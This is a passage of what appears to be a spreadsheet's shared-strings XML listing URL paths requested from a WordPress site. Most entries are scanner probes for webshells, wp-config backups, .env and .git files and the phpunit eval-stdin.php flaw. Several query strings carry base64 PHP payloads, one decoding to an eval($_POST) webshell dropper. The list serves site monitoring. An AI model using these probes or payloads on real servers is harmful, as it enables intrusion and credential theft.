    <t>wp.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-catcher/3.1415926535898.php</t>
  </si>
  <si>
    <t>view.php?name=Hitesha%20Chandranee</t>
  </si>
  <si>
    <t>hosting.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-catcher/admin.php</t>
  </si>
  <si>
    <t>class.api.php</t>
  </si>
  <si>
    <t>cong.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3Bjanl2LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2pscHV3LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>ulqfraum.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>sdihbtsf.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wp-l0gin.php</t>
  </si>
  <si>
    <t>ext.php</t>
  </si>
  <si>
    <t>slrcld.php</t>
  </si>
  <si>
    <t>ixhdlv.php</t>
  </si>
  <si>
    <t>bless.php</t>
  </si>
  <si>
    <t>wp-content/plugins/root-file-manager/wp-file.php</t>
  </si>
  <si>
    <t>wp-content/plugins/ph-file-manager/wp-file.php</t>
  </si>
  <si>
    <t>about.php?auth_key</t>
  </si>
  <si>
    <t>phplabware/internal_utilities/htmLawed/htmLawedTest.php</t>
  </si>
  <si>
    <t>viewup.php?name=Katie%20Rose&amp;date=2023-11-15</t>
  </si>
  <si>
    <t>wp-content/plugins/startklar-elmentor-forms-extwidgets/readme.txt</t>
  </si>
  <si>
    <t>view.php?name=Sruthy%20Sithara</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-config-sample.php</t>
  </si>
  <si>
    <t>checkbex.php</t>
  </si>
  <si>
    <t>wp-content/wp-term.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-term.php</t>
  </si>
  <si>
    <t>wp-content/wp-ver.php</t>
  </si>
  <si>
    <t>wp-content/admin.php?520</t>
  </si>
  <si>
    <t>admin.php?520</t>
  </si>
  <si>
    <t>wp-content/about.php?520</t>
  </si>
  <si>
    <t>about.php?520</t>
  </si>
  <si>
    <t>wp-content/uploads/wp-config-sample.php</t>
  </si>
  <si>
    <t>wp-content/plugins/dummyyummy/wp-signup.php</t>
  </si>
  <si>
    <t>wp-admin/dropdown.php</t>
  </si>
  <si>
    <t>wp-content/themes/digital-download/new.php</t>
  </si>
  <si>
    <t>wp-content/themes/aahana/json.php</t>
  </si>
  <si>
    <t>wp-content/themes/travelscape/json.php</t>
  </si>
  <si>
    <t>atomlib.php</t>
  </si>
  <si>
    <t>wp-content/plugins/seoplugins/mar.php</t>
  </si>
  <si>
    <t>wp-content/themes/seotheme/mar.php</t>
  </si>
  <si>
    <t>.git/config</t>
  </si>
  <si>
    <t>wp-content/plugins/jetpack/_inc/jetpack-admin.js</t>
  </si>
  <si>
    <t>wp-content/plugins/elementor/assets/js/notes.js</t>
  </si>
  <si>
    <t>wp-content/plugins/contact-form-7/admin/js/scripts.js</t>
  </si>
  <si>
    <t>wp-content/plugins/akismet/_inc/akismet.js</t>
  </si>
  <si>
    <t>wp-content/plugins/woocommerce/assets/js/admin/users.js</t>
  </si>
  <si>
    <t>input.php</t>
  </si>
  <si>
    <t>lol.php</t>
  </si>
  <si>
    <t>uycqlzxn.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>siqrmhsc.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>viewup.php?name=Shivaleeka%20Oberoi&amp;date=2023-11-15</t>
  </si>
  <si>
    <t>tag/splitsvilla/</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2NvbWNqLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>viewup.php?name=Priyanka%20Kumar&amp;date=2023-05-21</t>
  </si>
  <si>
    <t>view_all.php?name=Rambha%20Ranjith%20Kallingal</t>
  </si>
  <si>
    <t>viewup.php?name=Rambha%20Ranjith%20Kallingal&amp;date=2023-12-29</t>
  </si>
  <si>
    <t>wp-content/plugins/linkpreview/up.php</t>
  </si>
  <si>
    <t>wp-content/plugins/seoplugins/db.php?u</t>
  </si>
  <si>
    <t>wp-content/themes/bute/lang.php</t>
  </si>
  <si>
    <t>wp-content/plugins/work-list/lang.php</t>
  </si>
  <si>
    <t>.wp-config.swn</t>
  </si>
  <si>
    <t>wp-config.swn</t>
  </si>
  <si>
    <t>wp-content/plugins/core/include.php</t>
  </si>
  <si>
    <t>wp-config.swo</t>
  </si>
  <si>
    <t>.wp-config.swo</t>
  </si>
  <si>
    <t>wp-config.swp</t>
  </si>
  <si>
    <t>.wp-config.swp</t>
  </si>
  <si>
    <t>.wp-config.old</t>
  </si>
  <si>
    <t>wp-config.old</t>
  </si>
  <si>
    <t>.wp-config.save</t>
  </si>
  <si>
    <t>wp-config.save</t>
  </si>
  <si>
    <t>rkfirtje.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>wvmydsnp.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>.wp-config~</t>
  </si>
  <si>
    <t>wp-config~</t>
  </si>
  <si>
    <t>fpliresi.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>zqhwhitd.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>bigg-boss/unveiling-the-charismatic-journey-of-ayesha-khan-from-bigg-boss-contestant-to-influential-personality/</t>
  </si>
  <si>
    <t>nf_tracking.php</t>
  </si>
  <si>
    <t>defaults.php</t>
  </si>
  <si>
    <t>kannada-movies/1743/</t>
  </si>
  <si>
    <t>uncategorized/must-watch-movie-of-sukrutha-wagle-jatta-%e0%b2%b8%e0%b3%81%e0%b2%95%e0%b3%83%e0%b2%a4%e0%b2%be-%e0%b2%b5%e0%b2%be%e0%b2%97%e0%b3%8d%e0%b2%b2%e0%b3%86-%e0%b2%9c%e0%b2%9f%e0%b3%8d%e0%b2%9f%e0%b2%be/?unapproved=97&amp;moderation-hash=2201da08d5d3baa06fedbeba6cd0943</t>
  </si>
  <si>
    <t>uncategorized/must-watch-movie-of-sukrutha-wagle-jatta-%e0%b2%b8%e0%b3%81%e0%b2%95%e0%b3%83%e0%b2%a4%e0%b2%be-%e0%b2%b5%e0%b2%be%e0%b2%97%e0%b3%8d%e0%b2%b2%e0%b3%86-%e0%b2%9c%e0%b2%9f%e0%b3%8d%e0%b2%9f%e0%b2%be/</t>
  </si>
  <si>
    <t>view_all.php?name=Nila%20Nambiar</t>
  </si>
  <si>
    <t>wp-content/uploads/2021/04/Image-1-768x960.jpg?v=1619065175</t>
  </si>
  <si>
    <t>view.php?name=Malavika%20Mohanan</t>
  </si>
  <si>
    <t>xx.php</t>
  </si>
  <si>
    <t>daily-updates/</t>
  </si>
  <si>
    <t>sellers.json</t>
  </si>
  <si>
    <t>top.php?action=door123</t>
  </si>
  <si>
    <t>wzy.php?action=door123</t>
  </si>
  <si>
    <t>templates/beez3/</t>
  </si>
  <si>
    <t>config.php</t>
  </si>
  <si>
    <t>alfa.php</t>
  </si>
  <si>
    <t>test.php</t>
  </si>
  <si>
    <t>a.php</t>
  </si>
  <si>
    <t>z.php</t>
  </si>
  <si>
    <t>x.php</t>
  </si>
  <si>
    <t>1.php</t>
  </si>
  <si>
    <t>fox.php</t>
  </si>
  <si>
    <t>upload.php</t>
  </si>
  <si>
    <t>up.php</t>
  </si>
  <si>
    <t>shell.php</t>
  </si>
  <si>
    <t>wso.php</t>
  </si>
  <si>
    <t>xleet.php</t>
  </si>
  <si>
    <t>olux.php</t>
  </si>
  <si>
    <t>shells.php</t>
  </si>
  <si>
    <t>?3x=3x</t>
  </si>
  <si>
    <t>wp-content/plugins/ubh/up.php</t>
  </si>
  <si>
    <t>admin/controller/extension/extension/cgialfa</t>
  </si>
  <si>
    <t>admin/controller/extension/extension/alfacgiapi</t>
  </si>
  <si>
    <t>admin/controller/extension/extension/ALFA_DATA</t>
  </si>
  <si>
    <t>sites/default/files/cgialfa</t>
  </si>
  <si>
    <t>sites/default/files/alfacgiapi</t>
  </si>
  <si>
    <t>sites/default/files/ALFA_DATA</t>
  </si>
  <si>
    <t>templates/beez3/cgialfa</t>
  </si>
  <si>
    <t>templates/beez3/alfacgiapi</t>
  </si>
  <si>
    <t>templates/beez3/ALFA_DATA</t>
  </si>
  <si>
    <t>wp-content/cgialfa</t>
  </si>
  <si>
    <t>wp-content/alfacgiapi</t>
  </si>
  <si>
    <t>wp-content/ALFA_DATA</t>
  </si>
  <si>
    <t>wp-admin/cgialfa</t>
  </si>
  <si>
    <t>wp-admin/alfacgiapi</t>
  </si>
  <si>
    <t>wp-admin/ALFA_DATA</t>
  </si>
  <si>
    <t>wp-includes/cgialfa</t>
  </si>
  <si>
    <t>wp-includes/alfacgiapi</t>
  </si>
  <si>
    <t>wp-includes/ALFA_DATA</t>
  </si>
  <si>
    <t>wp-content/uploads/cgialfa</t>
  </si>
  <si>
    <t>wp-content/uploads/alfacgiapi</t>
  </si>
  <si>
    <t>wp-content/uploads/ALFA_DATA</t>
  </si>
  <si>
    <t>.well-known/cgialfa</t>
  </si>
  <si>
    <t>.well-known/alfacgiapi</t>
  </si>
  <si>
    <t>.well-known/ALFA_DATA</t>
  </si>
  <si>
    <t>cgialfa</t>
  </si>
  <si>
    <t>alfacgiapi</t>
  </si>
  <si>
    <t>ALFA_DATA</t>
  </si>
  <si>
    <t>error.php?phpshells</t>
  </si>
  <si>
    <t>wp-backup-sql-302.php</t>
  </si>
  <si>
    <t>system_log.php?bala=up</t>
  </si>
  <si>
    <t>wp-content/outcms.php?up</t>
  </si>
  <si>
    <t>defau11.php</t>
  </si>
  <si>
    <t>xindex.php</t>
  </si>
  <si>
    <t>archives.php</t>
  </si>
  <si>
    <t>wp-content/db-cache.php</t>
  </si>
  <si>
    <t>gank.php.PhP</t>
  </si>
  <si>
    <t>wp-plugins.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wpconfig.bak.php?act=sf</t>
  </si>
  <si>
    <t>legion.php</t>
  </si>
  <si>
    <t>wp-content/themes/config.bak.php</t>
  </si>
  <si>
    <t>config.bak.php</t>
  </si>
  <si>
    <t>wp-content/mu-plugins/db-safe-mode.php</t>
  </si>
  <si>
    <t>wp-content/plugins/backup_index.php</t>
  </si>
  <si>
    <t>wp-booking.php</t>
  </si>
  <si>
    <t>moduless.php</t>
  </si>
  <si>
    <t>css.php</t>
  </si>
  <si>
    <t>defau1t.php</t>
  </si>
  <si>
    <t>wp-includes/css/css.php</t>
  </si>
  <si>
    <t>wp-includes/images/css.php</t>
  </si>
  <si>
    <t>wp-content/export.php</t>
  </si>
  <si>
    <t>export.php</t>
  </si>
  <si>
    <t>media-admin.php</t>
  </si>
  <si>
    <t>wp-signin.php?dizo&amp;ping</t>
  </si>
  <si>
    <t>ups.php</t>
  </si>
  <si>
    <t>beence.php</t>
  </si>
  <si>
    <t>wp_wrong_datlib.php</t>
  </si>
  <si>
    <t>doc.php</t>
  </si>
  <si>
    <t>qindex.php?daksldlkdsadas=1</t>
  </si>
  <si>
    <t>wp-admin.php?daksldlkdsadas=1</t>
  </si>
  <si>
    <t>xmlrpcs.php?daksldlkdsadas=1</t>
  </si>
  <si>
    <t>xmrlpc.php?daksldlkdsadas=1</t>
  </si>
  <si>
    <t>old-index.php?daksldlkdsadas=1</t>
  </si>
  <si>
    <t>lock360.php?daksldlkdsadas=1</t>
  </si>
  <si>
    <t>radio.php</t>
  </si>
  <si>
    <t>wp-content/mu-plugins-old/?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt</t>
  </si>
  <si>
    <t>wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt</t>
  </si>
  <si>
    <t>3index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt</t>
  </si>
  <si>
    <t>1index.php</t>
  </si>
  <si>
    <t>s_ne.php</t>
  </si>
  <si>
    <t>s_e.php</t>
  </si>
  <si>
    <t>wp-admin/style.php</t>
  </si>
  <si>
    <t>xleet-shell.php</t>
  </si>
  <si>
    <t>wp-class.php</t>
  </si>
  <si>
    <t>wp-content/shell20211028.php</t>
  </si>
  <si>
    <t>wp-content/plugins/sid/sidwso.php</t>
  </si>
  <si>
    <t>bala.php</t>
  </si>
  <si>
    <t>wp-content/wso112233.php</t>
  </si>
  <si>
    <t>wso112233.php</t>
  </si>
  <si>
    <t>wp-head.php</t>
  </si>
  <si>
    <t>M1.php</t>
  </si>
  <si>
    <t>wp-content/themes/finley/min.php</t>
  </si>
  <si>
    <t>fm1.php</t>
  </si>
  <si>
    <t>xxl.php</t>
  </si>
  <si>
    <t>wp-content/plugins/press/wp-class.php</t>
  </si>
  <si>
    <t>wp-content/plugins/yyobang/mar.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa21ub3VtLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>css/</t>
  </si>
  <si>
    <t>st.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2NxZ3dpLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3FubXV0LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>wp-content/themes/defaul1.php%7CUEjlZcWL</t>
  </si>
  <si>
    <t>wp-includes/js/tinymce/plugins/wordpress/defaul1.php%7CUEjlZcWL</t>
  </si>
  <si>
    <t>wp-includes/js/tinymce/plugins/media/defaul1.php%7CUEjlZcWL</t>
  </si>
  <si>
    <t>wp-includes/customize/smooth_wp.php%7CF5d4JH6m1</t>
  </si>
  <si>
    <t>wp-includes/js/tinymce/plugins/fullscreen/defaul1.php%7CUEjlZcWL</t>
  </si>
  <si>
    <t>wp-includes/blocks/defaul1.php%7CUEjlZcWL</t>
  </si>
  <si>
    <t>defaul1.php%7CUEjlZcWL</t>
  </si>
  <si>
    <t>.well-known/pki-validation/Newsupway.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-apxupx.php?apx=upx</t>
  </si>
  <si>
    <t>wp-content/themes/about.php</t>
  </si>
  <si>
    <t>wp-content/plugins/about.php</t>
  </si>
  <si>
    <t>wp-content/about.php</t>
  </si>
  <si>
    <t>view.php?name=Priyanka%20Kumar</t>
  </si>
  <si>
    <t>general.php?pd=1&amp;mapname=op.php</t>
  </si>
  <si>
    <t>view.php?name=Bidisha%20Guha</t>
  </si>
  <si>
    <t>?author=9</t>
  </si>
  <si>
    <t>view.php?name=Asal%20Persian</t>
  </si>
  <si>
    <t>wp-admin/css/colors/light/content.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/light/admin.php</t>
  </si>
  <si>
    <t>pxpdzirb.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>.well-known/acme-challenge/about.php</t>
  </si>
  <si>
    <t>.well-known/acme-challenge/cloud.php</t>
  </si>
  <si>
    <t>admin.php?action=beindex&amp;password=sem2023</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3Z2YmNsLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>style.php?sig=rename</t>
  </si>
  <si>
    <t>sample.php?pd=1&amp;mapname=ova-tools.xml</t>
  </si>
  <si>
    <t>wp-content/plugins/incache/index.php</t>
  </si>
  <si>
    <t>wp-22.php?sfilename=ovatools.php&amp;sfilecontent=&amp;supfiles=</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3FieW5wLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>20021.php</t>
  </si>
  <si>
    <t>Wp-confiig.php</t>
  </si>
  <si>
    <t>repeater.php</t>
  </si>
  <si>
    <t>wp-content/classwithtostring.php</t>
  </si>
  <si>
    <t>yxs.php</t>
  </si>
  <si>
    <t>hoja.php</t>
  </si>
  <si>
    <t>classapi.php</t>
  </si>
  <si>
    <t>wp-content/pm.php</t>
  </si>
  <si>
    <t>suc.php</t>
  </si>
  <si>
    <t>w33.php</t>
  </si>
  <si>
    <t>content.php</t>
  </si>
  <si>
    <t>.well-known/pki-validation/wp-sigunq.php</t>
  </si>
  <si>
    <t>gecko.php</t>
  </si>
  <si>
    <t>cgi-bin/hyPool.php</t>
  </si>
  <si>
    <t>wp-includes/IXR/contents.php</t>
  </si>
  <si>
    <t>wp-content/wp-login.php</t>
  </si>
  <si>
    <t>wp-content/simple.php</t>
  </si>
  <si>
    <t>xmrlpc.php</t>
  </si>
  <si>
    <t>.well-known/acme-challenge/xmrlpc.php</t>
  </si>
  <si>
    <t>.well-known/acme-challenge/shell.php</t>
  </si>
  <si>
    <t>.well-known/acme-challenge/moon.php</t>
  </si>
  <si>
    <t>.well-known/acme-challenge/upfile.php</t>
  </si>
  <si>
    <t>wp-csuu.php</t>
  </si>
  <si>
    <t>classwithtostring.php</t>
  </si>
  <si>
    <t>wp-conflg.php</t>
  </si>
  <si>
    <t>.well-known/acme-challenge/install.php</t>
  </si>
  <si>
    <t>ids.php</t>
  </si>
  <si>
    <t>indo.php</t>
  </si>
  <si>
    <t>maxx.php</t>
  </si>
  <si>
    <t>wp-content/wp-aespa.php</t>
  </si>
  <si>
    <t>wp-content/content.php</t>
  </si>
  <si>
    <t>wp-content/css.php</t>
  </si>
  <si>
    <t>User-new.Php</t>
  </si>
  <si>
    <t>wp-links.php</t>
  </si>
  <si>
    <t>wp-admin/css/atomlib.php</t>
  </si>
  <si>
    <t>wp-includes/IXR/class_api.php</t>
  </si>
  <si>
    <t>ty.php</t>
  </si>
  <si>
    <t>lv.php</t>
  </si>
  <si>
    <t>xl2023.php</t>
  </si>
  <si>
    <t>wordpressdb.php</t>
  </si>
  <si>
    <t>lufi.php</t>
  </si>
  <si>
    <t>000.php</t>
  </si>
  <si>
    <t>wp-content/batm.php</t>
  </si>
  <si>
    <t>bak.php</t>
  </si>
  <si>
    <t>_chosen.php</t>
  </si>
  <si>
    <t>wp-content/cjfuns.php</t>
  </si>
  <si>
    <t>wp-content/CasperEx.php</t>
  </si>
  <si>
    <t>11mine.php</t>
  </si>
  <si>
    <t>xcc.php7</t>
  </si>
  <si>
    <t>cl.php</t>
  </si>
  <si>
    <t>cloud.php</t>
  </si>
  <si>
    <t>wp_info.php</t>
  </si>
  <si>
    <t>wp-content/bigrendy.php</t>
  </si>
  <si>
    <t>gix.php</t>
  </si>
  <si>
    <t>0808.php</t>
  </si>
  <si>
    <t>jetpack.php</t>
  </si>
  <si>
    <t>.inhec.PhP7</t>
  </si>
  <si>
    <t>plugin.php</t>
  </si>
  <si>
    <t>wp-content/1index.php</t>
  </si>
  <si>
    <t>core-admin.php</t>
  </si>
  <si>
    <t>.ontillex.PhP7</t>
  </si>
  <si>
    <t>ovatools.php</t>
  </si>
  <si>
    <t>alfa-rex.php7</t>
  </si>
  <si>
    <t>shell20211028.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/atomlib.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2VsdWdnLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>wp-content/plugins/core-builder/</t>
  </si>
  <si>
    <t>wp-content/plugins/task-controller/</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-task-scheduler/scheduler.php</t>
  </si>
  <si>
    <t>wp-content/themes/wp-classic/inc/</t>
  </si>
  <si>
    <t>wp-stad.php</t>
  </si>
  <si>
    <t>wp-content/themes/twentystd/</t>
  </si>
  <si>
    <t>geju.php</t>
  </si>
  <si>
    <t>wp-content/admin.php</t>
  </si>
  <si>
    <t>ayk.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa2Vma213LnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>indexall.php</t>
  </si>
  <si>
    <t>style.php?sig=update&amp;domain=51.79.124.111</t>
  </si>
  <si>
    <t>view.php</t>
  </si>
  <si>
    <t>wp-content/wso.php</t>
  </si>
  <si>
    <t>login.php</t>
  </si>
  <si>
    <t>wp-content/plugins/revslider/includes/external/page/up.php</t>
  </si>
  <si>
    <t>wp-content/plugins/revslider/includes/external/page/shell.php</t>
  </si>
  <si>
    <t>wp-content/plugins/revslider/includes/external/page/</t>
  </si>
  <si>
    <t>view.php?name=Style%20With%20Plixxi</t>
  </si>
  <si>
    <t>view.php?name=Sumi%20Chitra%2037</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa3J6aW9zLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>himal-gitti-pani.html</t>
  </si>
  <si>
    <t>sample.php?pd=1&amp;mapname=sample-x5.xml</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-base/index.php</t>
  </si>
  <si>
    <t>wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa25sdmZhLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs=</t>
  </si>
  <si>
    <t>allgallery/Vidyashree%20Jayaram/1.jpg</t>
  </si>
  <si>
    <t>.xas.php</t>
  </si>
  <si>
    <t>max.php</t>
  </si>
  <si>
    <t>wp-content/plugins/apikey/apikey.php?test=hello</t>
  </si>
  <si>
    <t>wp-content/plugins/t_file_wp/t_file_wp.php?test=hello</t>
  </si>
  <si>
    <t>wp-content/plugins/royal-ckeditor/admin.php</t>
  </si>
  <si>
    <t>wp-content/plugins/eventon-addon/admin.php</t>
  </si>
  <si>
    <t>wp-content/plugins/classic-addon/admin.php</t>
  </si>
  <si>
    <t>?code_check</t>
  </si>
  <si>
    <t>defaul1.php</t>
  </si>
  <si>
    <t>ms.php</t>
  </si>
  <si>
    <t>wp-content/wp-apxupx.php?apx=upx</t>
  </si>
  <si>
    <t>alfanew.PhP7</t>
  </si>
  <si>
    <t>chosen.php?upload</t>
  </si>
  <si>
    <t>wp-content/plugins/linkpreview/db.php?u</t>
  </si>
  <si>
    <t>ujcawbws.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>beniyihq.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>yfqtrayb.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>favwrqxu.php?Fox=d3wL7</t>
  </si>
  <si>
    <t>simple.phpp</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php</t>
  </si>
  <si>
    <t>wp-content/king.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php</t>
  </si>
  <si>
    <t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t>
  </si>
  <si>
    <t>/wp-content/x.php?1=system</t>
  </si>
  <si>
    <t>wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php</t>
  </si>
  <si>
    <t>abruzi.php4</t>
  </si>
  <si>
    <t>/wp-content/plugins/apikey/apikey.php</t>
  </si>
  <si>
    <t>wp-content/plugins/apikey/a57bze8931.php</t>
  </si>
  <si>
    <t>wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wp-file-upload/ROOBOTS.php</t>
  </si>
  <si>
    <t>wp-content/plugins/wordpresss3cll/up.php</t>
  </si>
  <si>
    <t>wp-content/plugins/TOPXOH/wDR.php</t>
  </si>
  <si>
    <t>wp-content/plugins/anttt/simple.php</t>
  </si>
  <si>
    <t>wp-content/plugins/royal-elementor-addons/assets/js/frontend.js</t>
  </si>
  <si>
    <t>wp-content/plugins/core-plugin/</t>
  </si>
  <si>
    <t>wp-content/plugins/core-plugin/about.php</t>
  </si>
  <si>
    <t>wp-content/plugins/WordPressCore/classwithtostring.php</t>
  </si>
  <si>
    <t>wp-content/themes/intense/block-css.php</t>
  </si>
  <si>
    <t>wp-pano.php</t>
  </si>
  <si>
    <t>/wp-admin/css/colors/blue/blue.php?wall=ZWNobyBhRHJpdjQ7ZXZhbCgkX1BPU1RbJ3Z6J10pOw==</t>
  </si>
  <si>
    <t>admin-ajax.php</t>
  </si>
  <si>
    <t>collections/all.atom</t>
  </si>
  <si>
    <t>wp-admin/js/widgets/content.php</t>
  </si>
  <si>
    <t>wp-admin/js/widgets/contents.php</t>
  </si>
  <si>
    <t>wp-admin/js/widgets/admin.php</t>
  </si>
  <si>
    <t>wp-admin/js/widgets/about.php</t>
  </si>
  <si>
    <t>wp-content/themes/pridmag/db.php?u</t>
  </si>
  <si>
    <t>wp-content/uploads/2021/04/Image-1-768x960.jpg</t>
  </si>
  <si>
    <t>wp-content/plugins/wordpressseotools/wp-add.php</t>
  </si>
  <si>
    <t>wp-content/woh.php</t>
  </si>
  <si>
    <t>/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/vendor/phpunit/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/vendor/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/phpunit/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/phpunit/phpunit/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/lib/phpunit/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/lib/phpunit/phpunit/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/lib/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>.local</t>
  </si>
  <si>
    <t>.production</t>
  </si>
  <si>
    <t>/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php</t>
  </si>
  <si>
    <t>.env</t>
  </si>
  <si>
